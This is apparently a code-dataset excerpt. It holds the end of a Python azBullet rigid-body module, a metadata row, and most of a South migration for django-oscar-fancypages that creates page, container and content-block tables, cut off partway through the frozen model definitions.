return RetVal(True, None, (tot_mass, tot_inertia, compound))
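    # Sketch (hypothetical CollShapeMeta field order; keyword form used to
    # avoid guessing it) of compiling a single-sphere body:
    #
    #   cs = CollShapeMeta(cstype='SPHERE', position=(0, 0, 0),
    #                      rotation=(0, 0, 0, 1),
    #                      csdata=CollShapeSphere(radius=1))
    #   rbState = rbState._replace(cshapes={'shape': cs})
    #   mass, inertia, compound = world.compileCollisionShape(1, rbState).data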
@typecheck
def createRigidBody(self, bodyID: int, rbState: _RigidBodyData):
"""
Create a new rigid body ``rbState`` with ``bodyID``.
:param int bodyID: ID of new rigid body.
:param _RigidBodyData rbState: State Variables of rigid body.
:return: Success
"""
# Convert rotation and position to Bullet types.
rot = Quaternion(*rbState.rotation)
pos = Vec3(*rbState.position)
# Build the collision shape.
ret = self.compileCollisionShape(bodyID, rbState)
mass, inertia, cshapes = ret.data
# Create a motion state for the initial rotation and position.
ms = azBullet.DefaultMotionState(azBullet.Transform(rot, pos))
# Instantiate the actual rigid body.
ci = azBullet.RigidBodyConstructionInfo(mass, ms, cshapes, inertia)
body = PyRigidBody(ci)
# Set additional parameters.
body.setFriction(0.1)
body.setDamping(0.02, 0.02)
body.setSleepingThresholds(0.1, 0.1)
# Attach my own admin structure to the body.
body.azrael = (bodyID, rbState)
# Add the rigid body to the body cache.
self.rigidBodies[bodyID] = body
return RetVal(True, None, None)
|
agpl-3.0
| 6,817,916,343,925,518,000
| 37.6
| 85
| 0.60327
| false
| 3.961024
| false
| false
| false
|
tangentlabs/django-oscar-fancypages
|
oscar_fancypages/fancypages/migrations/0001_initial.py
|
1
|
56653
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
depends_on = (
('assets', '0001_initial'),
('catalogue', '0009_auto__add_field_product_rating'),
('promotions', '0001_initial'),
('offer', '0001_initial'),
)
def forwards(self, orm):
# Adding model 'FancyPage'
db.create_table('fancypages_fancypage', (
('category_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['catalogue.Category'], unique=True, primary_key=True)),
('page_type', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='pages', null=True, to=orm['fancypages.PageType'])),
('keywords', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('status', self.gf('django.db.models.fields.CharField')(default=u'draft', max_length=15)),
('date_visible_start', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('date_visible_end', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
))
db.send_create_signal('fancypages', ['FancyPage'])
# Adding M2M table for field visibility_types on 'FancyPage'
db.create_table('fancypages_fancypage_visibility_types', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('fancypage', models.ForeignKey(orm['fancypages.fancypage'], null=False)),
('visibilitytype', models.ForeignKey(orm['fancypages.visibilitytype'], null=False))
))
db.create_unique('fancypages_fancypage_visibility_types', ['fancypage_id', 'visibilitytype_id'])
# Adding model 'PageType'
db.create_table('fancypages_pagetype', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=128)),
('template_name', self.gf('django.db.models.fields.CharField')(max_length=255)),
))
db.send_create_signal('fancypages', ['PageType'])
# Adding model 'VisibilityType'
db.create_table('fancypages_visibilitytype', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=128, null=True, blank=True)),
))
db.send_create_signal('fancypages', ['VisibilityType'])
# Adding model 'Container'
db.create_table('fancypages_container', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.SlugField')(max_length=50, blank=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=100, blank=True)),
('content_type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['contenttypes.ContentType'], null=True)),
('object_id', self.gf('django.db.models.fields.PositiveIntegerField')(null=True)),
))
db.send_create_signal('fancypages', ['Container'])
# Adding unique constraint on 'Container', fields ['name', 'content_type', 'object_id']
db.create_unique('fancypages_container', ['name', 'content_type_id', 'object_id'])
# Adding model 'OrderedContainer'
db.create_table('fancypages_orderedcontainer', (
('container_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.Container'], unique=True, primary_key=True)),
('display_order', self.gf('django.db.models.fields.PositiveIntegerField')()),
))
db.send_create_signal('fancypages', ['OrderedContainer'])
# Adding model 'ContentBlock'
db.create_table('fancypages_contentblock', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('container', self.gf('django.db.models.fields.related.ForeignKey')(related_name='blocks', to=orm['fancypages.Container'])),
('display_order', self.gf('django.db.models.fields.PositiveIntegerField')()),
))
db.send_create_signal('fancypages', ['ContentBlock'])
# Adding model 'TextBlock'
db.create_table('fancypages_textblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('text', self.gf('django.db.models.fields.TextField')(default='Your text goes here.')),
))
db.send_create_signal('fancypages', ['TextBlock'])
# Adding model 'TitleTextBlock'
db.create_table('fancypages_titletextblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(default='Your title goes here.', max_length=100)),
('text', self.gf('django.db.models.fields.TextField')(default='Your text goes here.')),
))
db.send_create_signal('fancypages', ['TitleTextBlock'])
# Adding model 'ImageBlock'
db.create_table('fancypages_imageblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
('alt_text', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
('link', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_asset', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='image_blocks', null=True, to=orm['assets.ImageAsset'])),
))
db.send_create_signal('fancypages', ['ImageBlock'])
# Adding model 'ImageAndTextBlock'
db.create_table('fancypages_imageandtextblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
('alt_text', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
('link', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_asset', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='image_text_blocks', null=True, to=orm['assets.ImageAsset'])),
('text', self.gf('django.db.models.fields.CharField')(default='Your text goes here.', max_length=2000)),
))
db.send_create_signal('fancypages', ['ImageAndTextBlock'])
# Adding model 'CarouselBlock'
db.create_table('fancypages_carouselblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('image_1', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_1', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_2', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_2', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_3', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_3', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_4', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_4', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_5', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_5', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_6', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_6', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_7', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_7', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_8', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_8', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_9', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_9', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('image_10', self.gf('fancypages.assets.fields.AssetKey')(blank=True, related_name='+', null=True, to=orm['assets.ImageAsset'])),
('link_url_10', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
))
db.send_create_signal('fancypages', ['CarouselBlock'])
# Adding model 'PageNavigationBlock'
db.create_table('fancypages_pagenavigationblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
))
db.send_create_signal('fancypages', ['PageNavigationBlock'])
# Adding model 'PrimaryNavigationBlock'
db.create_table('fancypages_primarynavigationblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
))
db.send_create_signal('fancypages', ['PrimaryNavigationBlock'])
# Adding model 'TabBlock'
db.create_table('fancypages_tabblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
))
db.send_create_signal('fancypages', ['TabBlock'])
# Adding model 'TwoColumnLayoutBlock'
db.create_table('fancypages_twocolumnlayoutblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('left_width', self.gf('django.db.models.fields.PositiveIntegerField')(default=6, max_length=3)),
))
db.send_create_signal('fancypages', ['TwoColumnLayoutBlock'])
# Adding model 'ThreeColumnLayoutBlock'
db.create_table('fancypages_threecolumnlayoutblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
))
db.send_create_signal('fancypages', ['ThreeColumnLayoutBlock'])
# Adding model 'FourColumnLayoutBlock'
db.create_table('fancypages_fourcolumnlayoutblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
))
db.send_create_signal('fancypages', ['FourColumnLayoutBlock'])
# Adding model 'VideoBlock'
db.create_table('fancypages_videoblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('source', self.gf('django.db.models.fields.CharField')(max_length=50)),
('video_code', self.gf('django.db.models.fields.CharField')(max_length=50)),
))
db.send_create_signal('fancypages', ['VideoBlock'])
# Adding model 'TwitterBlock'
db.create_table('fancypages_twitterblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('username', self.gf('django.db.models.fields.CharField')(max_length=50)),
('max_tweets', self.gf('django.db.models.fields.PositiveIntegerField')(default=5)),
))
db.send_create_signal('fancypages', ['TwitterBlock'])
# Adding model 'SingleProductBlock'
db.create_table('fancypages_singleproductblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('product', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['catalogue.Product'], null=True)),
))
db.send_create_signal('fancypages', ['SingleProductBlock'])
# Adding model 'HandPickedProductsPromotionBlock'
db.create_table('fancypages_handpickedproductspromotionblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('promotion', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['promotions.HandPickedProductList'], null=True)),
))
db.send_create_signal('fancypages', ['HandPickedProductsPromotionBlock'])
# Adding model 'AutomaticProductsPromotionBlock'
db.create_table('fancypages_automaticproductspromotionblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('promotion', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['promotions.AutomaticProductList'], null=True)),
))
db.send_create_signal('fancypages', ['AutomaticProductsPromotionBlock'])
# Adding model 'OfferBlock'
db.create_table('fancypages_offerblock', (
('contentblock_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['fancypages.ContentBlock'], unique=True, primary_key=True)),
('offer', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['offer.ConditionalOffer'], null=True)),
))
db.send_create_signal('fancypages', ['OfferBlock'])
def backwards(self, orm):
# Removing unique constraint on 'Container', fields ['name', 'content_type', 'object_id']
db.delete_unique('fancypages_container', ['name', 'content_type_id', 'object_id'])
# Deleting model 'FancyPage'
db.delete_table('fancypages_fancypage')
# Removing M2M table for field visibility_types on 'FancyPage'
db.delete_table('fancypages_fancypage_visibility_types')
# Deleting model 'PageType'
db.delete_table('fancypages_pagetype')
# Deleting model 'VisibilityType'
db.delete_table('fancypages_visibilitytype')
# Deleting model 'Container'
db.delete_table('fancypages_container')
# Deleting model 'OrderedContainer'
db.delete_table('fancypages_orderedcontainer')
# Deleting model 'ContentBlock'
db.delete_table('fancypages_contentblock')
# Deleting model 'TextBlock'
db.delete_table('fancypages_textblock')
# Deleting model 'TitleTextBlock'
db.delete_table('fancypages_titletextblock')
# Deleting model 'ImageBlock'
db.delete_table('fancypages_imageblock')
# Deleting model 'ImageAndTextBlock'
db.delete_table('fancypages_imageandtextblock')
# Deleting model 'CarouselBlock'
db.delete_table('fancypages_carouselblock')
# Deleting model 'PageNavigationBlock'
db.delete_table('fancypages_pagenavigationblock')
# Deleting model 'PrimaryNavigationBlock'
db.delete_table('fancypages_primarynavigationblock')
# Deleting model 'TabBlock'
db.delete_table('fancypages_tabblock')
# Deleting model 'TwoColumnLayoutBlock'
db.delete_table('fancypages_twocolumnlayoutblock')
# Deleting model 'ThreeColumnLayoutBlock'
db.delete_table('fancypages_threecolumnlayoutblock')
# Deleting model 'FourColumnLayoutBlock'
db.delete_table('fancypages_fourcolumnlayoutblock')
# Deleting model 'VideoBlock'
db.delete_table('fancypages_videoblock')
# Deleting model 'TwitterBlock'
db.delete_table('fancypages_twitterblock')
# Deleting model 'SingleProductBlock'
db.delete_table('fancypages_singleproductblock')
# Deleting model 'HandPickedProductsPromotionBlock'
db.delete_table('fancypages_handpickedproductspromotionblock')
# Deleting model 'AutomaticProductsPromotionBlock'
db.delete_table('fancypages_automaticproductspromotionblock')
# Deleting model 'OfferBlock'
db.delete_table('fancypages_offerblock')
models = {
'assets.imageasset': {
'Meta': {'object_name': 'ImageAsset'},
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'default': "''"}),
'height': ('django.db.models.fields.IntegerField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'size': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'width': ('django.db.models.fields.IntegerField', [], {'blank': 'True'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'catalogue.attributeentity': {
'Meta': {'object_name': 'AttributeEntity'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entities'", 'to': "orm['catalogue.AttributeEntityType']"})
},
'catalogue.attributeentitytype': {
'Meta': {'object_name': 'AttributeEntityType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'})
},
'catalogue.attributeoption': {
'Meta': {'object_name': 'AttributeOption'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'options'", 'to': "orm['catalogue.AttributeOptionGroup']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'option': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'catalogue.attributeoptiongroup': {
'Meta': {'object_name': 'AttributeOptionGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'catalogue.category': {
'Meta': {'ordering': "['full_name']", 'object_name': 'Category'},
'depth': ('django.db.models.fields.PositiveIntegerField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'full_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'})
},
'catalogue.option': {
'Meta': {'object_name': 'Option'},
'code': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'Required'", 'max_length': '128'})
},
'catalogue.product': {
'Meta': {'ordering': "['-date_created']", 'object_name': 'Product'},
'attributes': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.ProductAttribute']", 'through': "orm['catalogue.ProductAttributeValue']", 'symmetrical': 'False'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Category']", 'through': "orm['catalogue.ProductCategory']", 'symmetrical': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_discountable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'variants'", 'null': 'True', 'to': "orm['catalogue.Product']"}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ProductClass']", 'null': 'True'}),
'product_options': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'rating': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'recommended_products': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Product']", 'symmetrical': 'False', 'through': "orm['catalogue.ProductRecommendation']", 'blank': 'True'}),
'related_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'relations'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'score': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
'status': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '128', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'upc': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'catalogue.productattribute': {
'Meta': {'ordering': "['code']", 'object_name': 'ProductAttribute'},
'code': ('django.db.models.fields.SlugField', [], {'max_length': '128'}),
'entity_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeEntityType']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'option_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeOptionGroup']", 'null': 'True', 'blank': 'True'}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'attributes'", 'null': 'True', 'to': "orm['catalogue.ProductClass']"}),
'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '20'})
},
'catalogue.productattributevalue': {
'Meta': {'object_name': 'ProductAttributeValue'},
'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ProductAttribute']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attribute_values'", 'to': "orm['catalogue.Product']"}),
'value_boolean': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'value_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'value_entity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeEntity']", 'null': 'True', 'blank': 'True'}),
'value_float': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'value_integer': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'value_option': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeOption']", 'null': 'True', 'blank': 'True'}),
'value_richtext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'value_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
'catalogue.productcategory': {
'Meta': {'ordering': "['-is_canonical']", 'object_name': 'ProductCategory'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Category']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_canonical': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
},
'catalogue.productclass': {
'Meta': {'ordering': "['name']", 'object_name': 'ProductClass'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'options': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'requires_shipping': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
'track_stock': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'catalogue.productrecommendation': {
'Meta': {'object_name': 'ProductRecommendation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'primary': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary_recommendations'", 'to': "orm['catalogue.Product']"}),
'ranking': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'recommendation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'fancypages.automaticproductspromotionblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'AutomaticProductsPromotionBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'promotion': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['promotions.AutomaticProductList']", 'null': 'True'})
},
'fancypages.carouselblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'CarouselBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'image_1': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_10': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_2': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_3': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_4': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_5': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_6': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_7': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_8': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'image_9': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'link_url_1': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'link_url_10': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'link_url_2': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'link_url_3': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'link_url_4': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'link_url_5': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'link_url_6': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
